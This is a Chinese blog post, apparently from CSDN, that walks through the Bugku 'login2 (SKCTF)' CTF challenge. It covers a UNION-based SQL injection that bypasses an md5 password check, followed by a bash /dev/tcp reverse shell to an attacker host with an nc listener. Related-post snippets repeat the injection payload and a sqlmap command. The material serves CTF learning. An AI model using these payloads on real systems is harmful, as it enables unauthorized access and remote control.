bugku-Web-login2(SKCTF)(union注入绕过密码、反弹shell)

最新推荐文章于 2023-03-07 16:12:20 发布
最新推荐文章于 2023-03-07 16:12:20 发布
阅读量2.9k 收藏 1
点赞数
分类专栏: Linux sql注入 文章标签: bugku-Web 反弹shell union注入绕过密码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zz_Caleb/article/details/89054600
版权

hint:union,命令执行

我们的第一步就是要利用union注入进行登录了,bp抓个包看看:

 相应头这里还是给了我们一个tip的,base64解码得到:

$sql="SELECT username,password FROM admin WHERE username='".$username."'";
if (!empty($row) && $row['password']===md5($password)){
}

这告诉我们要登录要满足的条件:查询结果不为空,其次,输入的password的值要等于md5(password)。

利用union进行如下post:

 这样就能用后台数据库中并不存在的密码来绕过并登录成功:

 下面进入一个命令执行的页面:

 看了一些wp,有的是用py脚本进行爆破,命令执行的结果太乱了,看不出什么门道,最后还是采用的反弹shell来做的。

反弹shell需要有公网ip,我们假设有个公网ip192.168.10.130,不用公网ip的话就线下赛局域网做题也行。

输入bash -i >& /dev/tcp/192.168.10.130/8888 0>&1并执行,然后在kali上运行命令:nc -lvp 8888,就能进行连接了,找到flag文件就拿到flag了。

大千SS
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
magento2-force-login:强制Magento 2的客户登录模块
05-14
Magento:registered:2的强制登录模块 Magento:registered:2的“强制登录”模块允许您限制访问者...安装bitexpert/magento2-force-customer-login的首选方法是通过Composer。 只需添加bitexpert/magento2-force-cust
Bugku-CTFlogin2(SKCTF)(hint:union,命令执行)
weixin_30593443的博客
07-11 544
Day40 login2(SKCTF) http://123.206.31.85:49165/ SKCTF{xxxxxxxxxxxxxxxxxxxxx} hint:union,命令执行 本题要点:union绕过、命令执行、脚本编写、base64编码 打开页面如下: 用bp尝试抓包,打开代理 ...
记一道CTF 中遇到的SQL注入新型万能密码问题
大方子
10-09 7846
0x00. 引言 我们平时遇到的SQL注入万能密码都是形如admin' or '1'='1, 这种使用or 关键字使得查询结果永真,或者形如:' UNION Select 1,1,1 FROM admin Where ''=',这种使用union使得查询结果永真, 但是有一次我在CTF的比赛中遇到的SQL注入问题,使用这两种万能密码都不好使,不管怎么变换形式,都不好使,显然是or和union ...
bugku-CTFlogin2(SKCTF)(hint:union,命令执行)
Abc_Kimball的博客
01-31 657
本题要点:union绕过、命令执行、脚本编写、base64编码 进入页面 使用弱口令破解,一顿弱口令没卵用 抓包查看不用抓包,直接发送到repeater并且go 看见tip有些乱码,拿走解码,base64解密 sql="SELECTusername,passwordFROMadminWHEREusername=′".sql="SELECT username,password FROM admin WHERE username='".sql="SELECTusername,passwordFROMadmin
常用反弹 shell 方式总结
未完成的歌~的博客
03-07 4679
反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。
ctf-WEB-login2(sql注入)
god_001的博客
05-12 2272
题目地址:跳转提示 打开网址,是一个熟悉的登陆页面,几次登录尝试发现报错回显只有一种 应当不是基于布尔的盲注,bp抓包看看: 发现响应中有一串奇怪的字符,尝试使用base64解码,得到: 这应该是一个提示,需要绕过其判断条件 这里就可以利用联合查询来注入union select) 之前说过,union select后面加数字串时,如果没有后面的表名,则该语句没有向任何一个数据库查询,那么它输出的内容就是select后的数字,并且使用联合查询要求必须保证前后查询的字段数一致,因此要绕
BugKu-CTF(web篇)---login2
Nailaoyyds的博客
04-02 3314
目录 login2 base64解码 审计分析语句 制作payload 拿到flag login2 从登录框入手 抓包分析一下,发现了一个小tip base64解码 审计分析语句 审计一下:想要登录成功,可以 通过输入不存在用户,用union select 构造出指定密码的md5值这样 payload为username=admin' union select 1,md5(123)#&passwor...
Bugku web login2
qq_41696858的博客
07-26 495
今天中午忙着去吃饭,场景过时了,就没法录视频了,简单说一下吧: 前面都一样,通过sql注入过登录界面,先随便提交点啥,burp抓包,发现response有base64编码内容,解码发现是php代码 $sql="SELECT username,password FROM admin WHERE username='".$username."'"; if (!empty($row) && $row['password']===md5($password)){ } 由于没有限制行数,盲猜可以un
bugku web-login2
weixin_46578840的博客
09-07 554
打开看到一个登录框。 提示是命令执行,但这个框,怎么也不像有命令执行的呀 看评论发现有注入, 用sqlmap跑一下,正好回顾一下命令。python sqlmap.py -r sql.txt --level 5 --batch –batch //选项不询问,全部按照默认 得到注入点,跑数据库python sqlmap.py -r web37.txt --dbs --hex,这里要很久跑完的时候忘记截图,直接关掉窗口了。。。 得到一个information_schema和bugkuctfbugkuctf的表
vaadin-login:vaadin-login是一组具有密码管理器支持的登录表单的Web组件
02-06
<vaadin> | 包含两个组件: 是Web组件,可提供无痛的登录体验,是一部分。 组件在覆盖内显示。 < vaadin> </ vaadin> 是一个Web组件,提供了一个表单,要求用户登录到应用程序。 < vaadin> 安装安装vaadin-login : ...
Linux的Login Shell & Non-Login shell
01-20
Login Shell 是指登录时,需要提供用户名密码shell,如:su – user1 , 图形登录, ctrl+alt+F2-6进入的登录界面。 这种Login shell 执行脚本的顺序: 1. /etc/profile 【全局profile文件;它定义了LoginUser的 ...
dash-flask-login:在Dash之上实现Flask-login
02-05
这个例子配备了一个标准的用户名test和密码test1 ,但你可以添加使用的用户越多add_remove_users.ipynb jupyter笔记本或可用功能users_mgt.py 。文件说明: add_remove_users.ipynb :帮助创建和删除用户的Jupyter...
npm-shell-login:NPM在任何shell中登录
05-01
NPM Shell登录 无论何时使用CI服务或容器,都可能会遇到登录npm的问题。 通常提供的解决方案来执行npm login -e | echo ... npm login -e | echo ...不适用于所有shell。 该软件包提供了一种可靠的解决方案,可以在...
攻防世界-Misc-glance-50(convert分离gif、montage图片拼接)-mma-ctf-2nd-2016
Sea_Sand息禅
04-24 9194
拿到一个gif图片,很窄(宽2px),无语。 我们可以先把gif分解开,kali的convert命令可以,也可以用其他的工具:convert glance.gif flag.png 总共分离出来200个图片。 这么窄的图,难道要横着拼起来? 于是又用到一个工具:montage,这个工具用法很多,也很强大 用命令:montage flag*.png -tile x1 -geometr...
kali打开networkmanager
Sea_Sand息禅
03-13 7540
有时候可能在用网卡时,或者是其他情况下关闭了networkmanager,而要管理网络这个又是必须的,需要我们手动打开。 没有网络管理器是这样的: 有管理器是这样的: 不多废话了,用命令/etc/init.d/network-manager start打开networkmanager ...
kali Apache简单操作
Sea_Sand息禅
06-01 5368
kali上是自带的有Apache的,学习一些简单的操作。 1、基础操作 打开:/etc/init.d/apache2 start 重启:/etc/init.d/apache2 restart 关闭:/etc/init.d/apache2 stop 2、修改默认目录 修改/etc/apache2/sites-available/000-default.conf 修改这里的目录就可以修改127.0....
metasploit学习之路(一)简介、安装、目录结构、模块介绍
Sea_Sand息禅
07-06 4569
以前学过一点基本操作,但是时间一长忘记了很多,这次打算重新打打metasploit的基础,好好学习一下。 一、metasploit简介 说起metasploit,真是一个很强大的存在,其本身可以调用nmap进行强大的扫描功能,也可以和其他强大的工具进行结合使用,2003年面世以来在万网络安全领域独领风骚,使渗透操作变得很简单,甚至有的地方介绍说有了metasploit,人人皆黑客。 作为这么一个强...
kali工具之convert
Sea_Sand息禅
07-10 4200
很多人可能没有用过这个工具,但这个工具确实是一个很强大的工具,关于这个工具的学习和使用,我也涉及的很少,下面把我用到的列出来: 1、水平镜像反转图片 参数 -flop 有一次遇到一个这样的图片reverse.jpg: 是一个水平反转的,下面使用该工具对其进行水平镜像反转,使其变为正常: convert -flop reverse.jpg reversed.jpg 效果如下: 2、垂直镜像反转...
kali linux终端快捷键设置(gnome及新版kali2019.4和kali2020的xfce)
Sea_Sand息禅
02-27 3157
kali里面是没有终端快捷键的,需要自己设置。 gnome桌面 打开设置->设备->keyboard,拉到最下面点击加号来新建一个快捷键。 名称:打开终端 命令:gnome-terminal 快捷键:Ctrl+Alt+T (可自定义设置) 当然,也可以根据自己需要设置其他的快捷键。 xfce桌面 新版的kali2019.4和2020使用了轻量的xfce桌面,设置...
http://localhost:8090/upms-web/login js去掉最后的/login
最新发布
07-25
抱歉,我不能直接访问您提供的链接。但是,如果您想要去除URL中的"/login"部分,您可以使用JavaScript的字符串操作方法来实现。以下是一个示例代码片段,展示了如何去除URL中的最后一个"/login": ```javascript var url = "http://localhost:8090/upms-web/login"; var modifiedUrl = url.slice(0, url.lastIndexOf("/login")); console.log(modifiedUrl); ``` 在上面的代码中,我们使用了`slice()`方法来获取除了最后一个"/login"之外的部分,并将结果存储在`modifiedUrl`变量中。您可以根据自己的需求修改代码以适应您的具体情况。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值